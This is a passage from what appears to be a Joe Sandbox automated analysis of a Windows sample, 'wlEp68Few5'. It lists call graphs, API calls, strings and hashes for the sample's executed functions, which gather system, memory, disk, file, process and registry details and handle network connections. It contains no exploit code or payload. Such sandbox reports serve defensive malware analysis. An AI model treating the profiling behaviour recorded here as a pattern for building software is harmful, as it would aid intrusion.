7fe07d 87365->87368 87366 7fe16e 87366->87364 87367 7ffe96 isxdigit 87367->87368 87368->87366 87368->87367 87369 4a95b0 87370 4a95c8 87369->87370 87372 4a95fd 87369->87372 87371 4aa150 getsockname 87370->87371 87370->87372 87371->87372 87373 4a6ab0 87374 4a6ad5 87373->87374 87375 4a6bb4 87374->87375 87376 486fa0 select 87374->87376 87377 525ed0 7 API calls 87375->87377 87379 4a6b54 87376->87379 87378 4a6ba9 87377->87378 87379->87375 87379->87378 87380 4a6b5d 87379->87380 87380->87378 87382 525ed0 87380->87382 87385 525a50 87382->87385 87384 525ee5 87384->87380 87386 525a58 87385->87386 87390 525ea0 87385->87390 87387 525b50 87386->87387 87395 525b88 87386->87395 87398 525a99 87386->87398 87391 525eb4 87387->87391 87392 525b7a 87387->87392 87387->87395 87388 525e96 87418 539480 socket ioctlsocket connect getsockname closesocket 87388->87418 87390->87384 87419 526f10 socket ioctlsocket connect getsockname closesocket 87391->87419 87408 5270a0 87392->87408 87402 525cae 87395->87402 87416 525ef0 socket ioctlsocket connect getsockname 87395->87416 87396 525ec2 87396->87396 87398->87395 87401 5270a0 6 API calls 87398->87401 87415 526f10 socket ioctlsocket connect getsockname closesocket 87398->87415 87401->87398 87402->87388 87404 53a920 87402->87404 87417 539320 socket ioctlsocket connect getsockname closesocket 87402->87417 87405 53a944 87404->87405 87406 53a977 send 87405->87406 87407 53a94b 87405->87407 87406->87402 87407->87402 87409 5270ae 87408->87409 87411 52717f 87409->87411 87414 5271a7 87409->87414 87420 53a8c0 87409->87420 87424 5271c0 socket ioctlsocket connect getsockname 87409->87424 87411->87414 87425 539320 socket ioctlsocket connect getsockname closesocket 87411->87425 87414->87395 87415->87398 87416->87395 87417->87402 87418->87390 87419->87396 87421 53a903 recvfrom 87420->87421 87422 53a8e6 87420->87422 87423 53a8ed 87421->87423 87422->87421 87422->87423 87423->87409 87424->87409 87425->87414 87257 7fb160 Sleep

                                                      Executed Functions

                                                      Function 004AF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                      • API String ID: 0-1590685507
                                                      • Opcode ID: d760fcf5603b9c509ab6c3a2745adbaaa546acd31db4da9d07118024fddd4229
                                                      • Instruction ID: 0c78b02454303c27a70e9d98288dec01d8c49093c829f727dda39f401a8599c2
                                                      • Opcode Fuzzy Hash: d760fcf5603b9c509ab6c3a2745adbaaa546acd31db4da9d07118024fddd4229
                                                      • Instruction Fuzzy Hash: 84C2C031A043449FD724CF69C480B6BB7E1BF99314F09866EEC888B352D335E989CB85
                                                      Function 0047255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 857 47255d-472614 call 7f9f70 GetSystemInfo call 8af770 call 8af960 GlobalMemoryStatusEx call 8af770 call 8af960 939 472619 call 7100b90 857->939 940 472619 call 7100a90 857->940 941 472619 call 7100bd2 857->941 942 472619 call 71009d3 857->942 943 472619 call 7100a15 857->943 944 472619 call 7100956 857->944 945 472619 call 7100cda 857->945 946 472619 call 710099b 857->946 947 472619 call 7100b5d 857->947 948 472619 call 7100a5d 857->948 949 472619 call 7100a41 857->949 950 472619 call 7100cc2 857->950 951 472619 call 7100b03 857->951 952 472619 call 7100c85 857->952 953 472619 call 7100b47 857->953 954 472619 call 7100a07 857->954 955 472619 call 710094b 857->955 956 472619 call 7100d0c 857->956 957 472619 call 710098c 857->957 958 472619 call 7100b70 857->958 959 472619 call 7100970 857->959 960 472619 call 7100c71 857->960 961 472619 call 7100932 857->961 962 472619 call 7100c37 857->962 963 472619 call 7100ab9 857->963 964 472619 call 7100a7a 857->964 965 472619 call 7100cbc 857->965 966 472619 call 7100aa1 857->966 967 472619 call 7100b22 857->967 968 472619 call 71009e3 857->968 969 472619 call 7100c25 857->969 970 472619 call 7100ba5 857->970 971 472619 call 7100928 857->971 972 472619 call 7100a2d 857->972 973 472619 call 7100aef 857->973 868 47261b-472620 869 472626-472637 call 8af570 868->869 870 47277c-472904 call 8af770 call 8af960 KiUserCallbackDispatcher call 8af770 call 8af960 call 8af770 call 8af960 call 7f8e38 call 7f8be0 call 7f8bd0 FindFirstFileW 868->870 874 472754-47275c 869->874 917 472906-472926 FindNextFileW 870->917 918 472928-47292c 870->918 876 472762-472777 call 8af960 874->876 877 47263c-47264f GetDriveTypeA 874->877 876->870 880 472655-472685 GetDiskFreeSpaceExA 877->880 881 472743-472751 call 7f8b98 877->881 880->881 884 47268b-47273e call 8af840 call 8af8d0 call 8af960 call 8af660 call 8af960 call 8af660 call 8af960 call 8adce0 880->884 881->874 884->881 917->917 917->918 919 472932-47296f call 8af770 call 8af960 call 7f8e78 918->919 920 47292e 918->920 926 472974-472979 919->926 920->919 927 47297b-4729a4 call 8af770 call 8af960 926->927 928 4729a9-4729fe call 7fa290 call 8af770 call 8af960 926->928 927->928 939->868 940->868 941->868 942->868 943->868 944->868 945->868 946->868 947->868 948->868 949->868 950->868 951->868 952->868 953->868 954->868 955->868 956->868 957->868 958->868 959->868 960->868 961->868 962->868 963->868 964->868 965->868 966->868 967->868 968->868 969->868 970->868 971->868 972->868 973->868
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE ref: 00472579
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 004725CC
                                                      • GetDriveTypeA.KERNELBASE ref: 00472647
                                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 0047267E
                                                      • KiUserCallbackDispatcher.NTDLL ref: 004727E2
                                                      • FindFirstFileW.KERNELBASE ref: 004728F8
                                                      • FindNextFileW.KERNELBASE ref: 0047291F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                      • String ID: ;%G$@$`
                                                      • API String ID: 3271271169-3612974686
                                                      • Opcode ID: 71850e9463d179a95c6761790fb3fcf87ddaeff6e42d1c7731b064a4f7f9c230
                                                      • Instruction ID: e7513239ddc6845107b67b51a6d746a67a69f98c0cf0ed618eb08f9f60961041
                                                      • Opcode Fuzzy Hash: 71850e9463d179a95c6761790fb3fcf87ddaeff6e42d1c7731b064a4f7f9c230
                                                      • Instruction Fuzzy Hash: 05D1C1B49053199FDB50EFA8C98569EBBF0FF48344F008969E998D7311E7749A84CF82
                                                      Function 004729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1395 4729ff-472a2f FindFirstFileA 1396 472a31-472a36 1395->1396 1397 472a38 1395->1397 1398 472a3d-472a91 call 8af8d0 call 8af960 RegOpenKeyExA 1396->1398 1397->1398 1403 472a93-472a98 1398->1403 1404 472a9a 1398->1404 1405 472a9f-472b0c call 8af8d0 call 8af960 CharUpperA call 7f8da0 1403->1405 1404->1405 1413 472b15 1405->1413 1414 472b0e-472b13 1405->1414 1415 472b1a-472b92 call 8af8d0 call 8af960 call 7f8e80 call 7f8e70 1413->1415 1414->1415 1424 472b94-472ba3 1415->1424 1425 472bcc-472c66 QueryFullProcessImageNameA CloseHandle call 7f8da0 1415->1425 1428 472ba5-472bae 1424->1428 1429 472bb0-472bc0 call 7f8e68 1424->1429 1435 472c6f 1425->1435 1436 472c68-472c6d 1425->1436 1428->1425 1432 472bc5-472bca 1429->1432 1432->1424 1432->1425 1437 472c74-472ce9 call 8af8d0 call 8af960 call 7f8e80 call 7f8e70 1435->1437 1436->1437 1446 472dcf-472e1c call 8af8d0 call 8af960 CloseHandle 1437->1446 1447 472cef-472d49 call 7f8bb0 call 7f8da0 1437->1447 1457 472e23-472e2e 1446->1457 1460 472d4b-472d63 call 7f8da0 1447->1460 1461 472d99-472dad 1447->1461 1458 472e37 1457->1458 1459 472e30-472e35 1457->1459 1462 472e3c-472ed6 call 8af8d0 call 8af960 1458->1462 1459->1462 1460->1461 1468 472d65-472d7d call 7f8da0 1460->1468 1461->1446 1477 472eea 1462->1477 1478 472ed8-472ee1 1462->1478 1468->1461 1473 472d7f-472d97 call 7f8da0 1468->1473 1473->1461 1479 472daf-472dc9 call 7f8e68 1473->1479 1481 472eef-472f16 call 8af8d0 call 8af960 1477->1481 1478->1477 1480 472ee3-472ee8 1478->1480 1479->1446 1479->1447 1480->1481
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                      • String ID: 0
                                                      • API String ID: 2406880114-4108050209
                                                      • Opcode ID: 81f6a6d078687963e269d14eb3a5aeb464513e0ca4c4701bed15eba2937b153f
                                                      • Instruction ID: 1cc41ac7e66024b23b9ad269a699f310ef820fe31a5a7fd60e6260f4ebbcd13b
                                                      • Opcode Fuzzy Hash: 81f6a6d078687963e269d14eb3a5aeb464513e0ca4c4701bed15eba2937b153f
                                                      • Instruction Fuzzy Hash: 86E1E6B09043199FDB50EF68D98469EBBF4EF44300F00886AE588DB355E778DA89CF42
                                                      Function 004805B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1541 4805b0-4805b7 1542 4805bd-4805d4 1541->1542 1543 4807ee 1541->1543 1544 4805da-4805e6 1542->1544 1545 4807e7-4807ed 1542->1545 1544->1545 1546 4805ec-4805f0 1544->1546 1545->1543 1547 4805f6-480620 call 487350 call 4770b0 1546->1547 1548 4807c7-4807cc 1546->1548 1553 48066a-48068c call 4adec0 1547->1553 1554 480622-480624 1547->1554 1548->1545 1559 480692-4806a0 1553->1559 1560 4807d6-4807e3 call 487380 1553->1560 1556 480630-480655 call 4770d0 call 4803c0 call 487450 1554->1556 1580 48065b-480668 call 4770e0 1556->1580 1581 4807ce 1556->1581 1563 4806a2-4806a4 1559->1563 1564 4806f4-4806f6 1559->1564 1560->1545 1567 4806b0-4806e4 call 4873b0 1563->1567 1569 4806fc-4806fe 1564->1569 1570 4807ef-48082b call 483000 1564->1570 1567->1560 1586 4806ea-4806ee 1567->1586 1571 48072c-480754 1569->1571 1584 480a2f-480a35 1570->1584 1585 480831-480837 1570->1585 1576 48075f-48078b 1571->1576 1577 480756-48075b 1571->1577 1598 480700-480703 1576->1598 1599 480791-480796 1576->1599 1582 48075d 1577->1582 1583 480707-480719 WSAEventSelect 1577->1583 1580->1553 1580->1556 1581->1560 1591 480723-480726 1582->1591 1583->1560 1590 48071f 1583->1590 1587 480a3c-480a52 1584->1587 1588 480a37-480a3a 1584->1588 1593 480839-48084c call 486fa0 1585->1593 1594 480861-48087e 1585->1594 1586->1567 1595 4806f0 1586->1595 1587->1560 1596 480a58-480a81 call 482f10 1587->1596 1588->1587 1590->1591 1591->1570 1591->1571 1608 480a9c-480aa4 1593->1608 1609 480852 1593->1609 1605 480882-48088d 1594->1605 1595->1564 1596->1560 1612 480a87-480a97 call 486df0 1596->1612 1598->1583 1599->1598 1603 48079c-4807c2 call 4776a0 1599->1603 1603->1598 1610 480970-480975 1605->1610 1611 480893-4808b1 1605->1611 1608->1560 1609->1594 1614 480854-48085f 1609->1614 1617 480a19-480a2c 1610->1617 1618 48097b-480989 call 4770b0 1610->1618 1615 4808c8-4808f7 1611->1615 1612->1560 1614->1605 1625 4808f9-4808fb 1615->1625 1626 4808fd-480925 1615->1626 1617->1584 1618->1617 1624 48098f-48099e 1618->1624 1627 4809b0-4809c1 call 4770d0 1624->1627 1628 480928-48093f 1625->1628 1626->1628 1632 4809a0-4809ae call 4770e0 1627->1632 1633 4809c3-4809c7 1627->1633 1634 4808b3-4808c2 1628->1634 1635 480945-48096b 1628->1635 1632->1617 1632->1627 1637 4809e8-480a03 WSAEnumNetworkEvents 1633->1637 1634->1610 1634->1615 1635->1634 1639 4809d0-4809e6 WSAEventSelect 1637->1639 1640 480a05-480a17 1637->1640 1639->1632 1639->1637 1640->1639
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,?), ref: 00480712
                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 004809DC
                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004809FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: EventSelect$EnumEventsNetwork
                                                      • String ID: N=G$multi.c
                                                      • API String ID: 2170980988-617635166
                                                      • Opcode ID: f9fb3359683aaef8124c5bf2bd3f9e435e0dcf3cd6f797f35732b27305f98db9
                                                      • Instruction ID: 2a30029913b455d5f4737f1aec3d02f32a424f29dbcee296e439310ab09479f5
                                                      • Opcode Fuzzy Hash: f9fb3359683aaef8124c5bf2bd3f9e435e0dcf3cd6f797f35732b27305f98db9
                                                      • Instruction Fuzzy Hash: 6FD1CE716183419BE750EF60C881BAFB7E8BF94308F044C2EF88592251E778E949CB96
                                                      Function 0053B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0053B2B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                                      • API String ID: 3358416759-2430778319
                                                      • Opcode ID: 39cf8dd2a3b011ebabfb6f2608dc029ed0789e7613ca4d3ce0b951c174a47d0e
                                                      • Instruction ID: f332aad5fa96d90a5326f9c78f1910b975ae47a6bb8f343de4e7da5f251cc9c9
                                                      • Opcode Fuzzy Hash: 39cf8dd2a3b011ebabfb6f2608dc029ed0789e7613ca4d3ce0b951c174a47d0e
                                                      • Instruction Fuzzy Hash: E1C183716043159FEB18DF24C895A6A7BE1FF88314F05896CFA498B3A2E731ED45CB81
                                                      Function 00486FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d55a2f38fbe2487eb538e08078b84136660ba2af078799b7cb078d6496efa1ba
                                                      • Instruction ID: 8e63db31dd5f9c7009cb2b06b3269094d0816b6800dbcb224c556a413f93f74f
                                                      • Opcode Fuzzy Hash: d55a2f38fbe2487eb538e08078b84136660ba2af078799b7cb078d6496efa1ba
                                                      • Instruction Fuzzy Hash: DF91E43060D3094BD335AA2888A47BF72D5EBC5364F348F2EE9A9422D4E778DC41D796
                                                      Function 0053A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0052712E,?,?,?,00001001,00000000), ref: 0053A90C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: recvfrom
                                                      • String ID:
                                                      • API String ID: 846543921-0
                                                      • Opcode ID: 69ee3dd1748738ff4e4eaa8236fd3ed06b2bed19af7c91dbf8ea2059b4499e29
                                                      • Instruction ID: fa0282d1011ad652ddc3b7849d2a59583e004c2be674f6e9c8d0654f56c364c2
                                                      • Opcode Fuzzy Hash: 69ee3dd1748738ff4e4eaa8236fd3ed06b2bed19af7c91dbf8ea2059b4499e29
                                                      • Instruction Fuzzy Hash: BAF01D76109348AFD2209F41DC44E6BBBEDFFC9754F05496DF998232119271AE10CAB2
                                                      Function 0052A440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0052A499
